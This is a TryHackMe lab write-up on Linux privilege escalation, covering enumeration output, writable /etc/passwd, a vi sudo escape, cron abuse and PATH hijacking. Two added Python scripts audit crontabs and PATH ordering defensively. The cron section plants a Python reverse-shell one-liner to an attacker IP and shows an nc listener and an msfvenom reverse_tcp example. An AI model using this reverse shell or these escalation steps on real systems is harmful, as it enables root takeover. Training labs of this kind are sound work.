TryHackMe(THM):Common Linux Privesc-Writeup


$/ > out_LinEnum.txt

#2 What is the target’s hostname?

$ more out_LinEnum.txt
[-] Hostname:

#3 Look at the output of /etc/passwd how many “user[x]” are there on the system?

[-] Group memberships:
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)

#4 How many available shells are there on the system?

[-] Available shells:
# /etc/shells: valid login shells

#5 What is the name of the bash script that is set to run every 5 minutes by cron?

[-] Crontab contents:
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/

#6 What critical file has had its permissions changed to allow some users to write to it?

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow

Abusing SUID/GUID Files

#1 What is the path of the file in user3’s directory that stands out to you?

stands out to you

Exploiting Writeable /etc/passwd

#2 Having read the information above, what direction privilege escalation is this attack?

Remember the tree

#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?

user@kali:~$ openssl passwd -1 -salt new 123

#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?


Escaping Vi Editor

#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

$ sudo -l
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi

Exploiting Crontab

#3 What is the flag to specify a payload in msfvenom?

$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom

#5 What directory is the “” under?

grep -r "" /*
/etc/crontab:*/5 * * * * root /home/user4/Desktop/


printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.**.**.**\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'\n" > /home/user4/Desktop/
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 48904
/bin/sh: 0: can't access tty; job control turned off
# whoami
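The cron job in the "Crontab contents" section and the `grep -r` result above show why this works: a root job runs a script that lives under a user's home directory, so whoever owns that file controls what root executes every five minutes. The following Python script is an added example (not part of the original writeup) that audits a system crontab for exactly this condition. It parses the seven-field format, takes the first word of each command as the target, and flags targets that are group/world-writable, missing from a writable directory, or owned by a non-root user while the job runs as root. The crontab lines, paths and file metadata are all constructed so the script runs offline; the `cleanup.sh`, `backup.sh` and `rotate.sh` names are assumptions, and `lookup_from_fs` shows how the same audit is fed from a live system with `os.stat`.

```python
import os
import shlex
import stat

# Constructed sample system crontab (the writeup's real script name is elided).
SAMPLE_CRONTAB = """# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/cleanup.sh
0 3 * * * root /usr/local/sbin/backup.sh --full
*/10 * * * * www-data /var/www/rotate.sh
"""

# Constructed metadata, path -> (owner uid, st_mode), standing in for os.stat().
SAMPLE_FILES = {
    "/home/user4/Desktop/cleanup.sh": (1003, 0o100755),  # owned by user4, run as root
    "/home/user4/Desktop": (1003, 0o040755),
    "/usr/local/sbin/backup.sh": (0, 0o100755),           # root-owned, 755: fine
    "/usr/local/sbin": (0, 0o040755),
    "/var/www/rotate.sh": (0, 0o100777),                  # world-writable script
    "/var/www": (0, 0o040755),
}

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines: m h dom mon dow user command..."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue  # environment assignment or malformed line
        jobs.append({"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]})
    return jobs


def lookup_from_dict(table):
    """Build a file_info callable backed by a constructed path table."""
    return lambda path: table.get(path)


def lookup_from_fs(path):
    """file_info callable for a live system: (uid, mode) or None if the path is missing."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return (st.st_uid, st.st_mode)


def audit_cron_jobs(text, file_info):
    """Return (target, reason) findings for jobs whose executable a non-root user controls."""
    findings = []
    for job in parse_system_crontab(text):
        try:
            target = shlex.split(job["command"])[0]
        except (ValueError, IndexError):
            continue
        if not target.startswith("/"):
            findings.append((target, "relative command resolved through cron's PATH"))
            continue
        parent = file_info(os.path.dirname(target))
        parent_writable = bool(parent and parent[1] & WRITE_BY_OTHERS
                               and not parent[1] & stat.S_ISVTX)
        info = file_info(target)
        if info is None:
            reason = ("missing target in a writable directory" if parent_writable
                      else "target does not exist")
            findings.append((target, reason))
            continue
        uid, mode = info
        if mode & WRITE_BY_OTHERS:
            findings.append((target, "target is group/world-writable"))
        if job["user"] == "root" and uid != 0:
            findings.append((target, "runs as root but owned by uid %d" % uid))
        if parent_writable:
            findings.append((target, "parent directory is writable without sticky bit"))
    return findings


if __name__ == "__main__":
    for target, reason in audit_cron_jobs(SAMPLE_CRONTAB, lookup_from_dict(SAMPLE_FILES)):
        print("%s: %s" % (target, reason))
    # On a real host: audit_cron_jobs(open("/etc/crontab").read(), lookup_from_fs)
```

The parent-directory check matters even when the script itself is root-owned and 0755: if the directory is writable and lacks the sticky bit, the file can be renamed away and replaced, which is the same outcome as a writable file.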

Exploiting PATH Variable

#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

user5@polobox:~$ ./script
Desktop Documents Downloads Music Pictures Public script Templates Videos

#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo "[whatever command we want to run]" > [name of the executable we're imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating?

echo "[whatever command we want to run]" > [name of the executable we're imitating]

#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

I already learned this in the "Learn Linux" room.
According to it, the syntax of this command is typically chmod <permissions> <file>.
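Steps #2 to #5 above describe one procedure: `script` calls `ls` without an absolute path, the shell resolves that name by walking `$PATH` in order, and a writable directory that comes first in the search wins. The following Python script is an added example (not code from the writeup) that demonstrates the same resolution rule from the defender's side: `resolve_in_path` mimics the shell's lookup, `hijack_risks` lists the PATH entries searched before the real binary's directory that any user could write to (world-writable, group-writable, empty, or `.`), and `demo` builds a throwaway layout in a temporary directory with a real and an imitation `ls` to show the two orderings side by side. Directory names and the script bodies are constructed for the demo.

```python
import os
import stat
import tempfile

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def resolve_in_path(name, path_value):
    """Return the first executable called `name` found by walking PATH left to right."""
    for entry in path_value.split(os.pathsep):
        directory = entry or "."  # an empty PATH element means the current directory
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijack_risks(path_value, expected_dir):
    """PATH entries searched before `expected_dir` where a user could plant a file.

    The sticky bit is deliberately not an exemption: it stops users deleting each
    other's files, but anyone can still create a new file in the directory.
    """
    risks = []
    for entry in path_value.split(os.pathsep):
        if entry == expected_dir:
            break
        if entry in ("", "."):
            risks.append((entry or "(empty)", "current directory searched before the real binary"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue  # a missing directory cannot be written to (yet)
        if st.st_mode & WRITE_BY_OTHERS:
            risks.append((entry, "writable directory searched before the real binary"))
    return risks


def _write_exec(path, body):
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, 0o755)


def demo():
    """Build a real `ls` and an imitation in a world-writable dir, then compare PATH orders."""
    with tempfile.TemporaryDirectory() as tmp:
        real_bin = os.path.join(tmp, "bin")
        writable = os.path.join(tmp, "tmp")
        os.mkdir(real_bin)
        os.mkdir(writable)
        os.chmod(writable, 0o777)  # mirrors /tmp being writable by everyone
        _write_exec(os.path.join(real_bin, "ls"), "#!/bin/sh\nexec /bin/ls \"$@\"\n")
        _write_exec(os.path.join(writable, "ls"), "#!/bin/sh\necho this is not the real ls\n")
        unsafe_path = os.pathsep.join([writable, real_bin])  # writable dir first
        safe_path = os.pathsep.join([real_bin, writable])    # real dir first
        return {
            "unsafe_resolves_to_fake": resolve_in_path("ls", unsafe_path) == os.path.join(writable, "ls"),
            "unsafe_risk_count": len(hijack_risks(unsafe_path, real_bin)),
            "safe_resolves_to_real": resolve_in_path("ls", safe_path) == os.path.join(real_bin, "ls"),
            "safe_risk_count": len(hijack_risks(safe_path, real_bin)),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%s: %s" % (key, value))
    # On a live host: hijack_risks(os.environ["PATH"], "/bin")
```

The fix for a SUID or cron-driven script is not to sanitise PATH at all but to call `/bin/ls` by absolute path; the audit above is for spotting the remaining scripts that still rely on the search order.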





I’m a Japanese high school student. I’m interested in hacking. I will be a super hacker like “Spooky”, who I respect the most. I have to study hacking for that.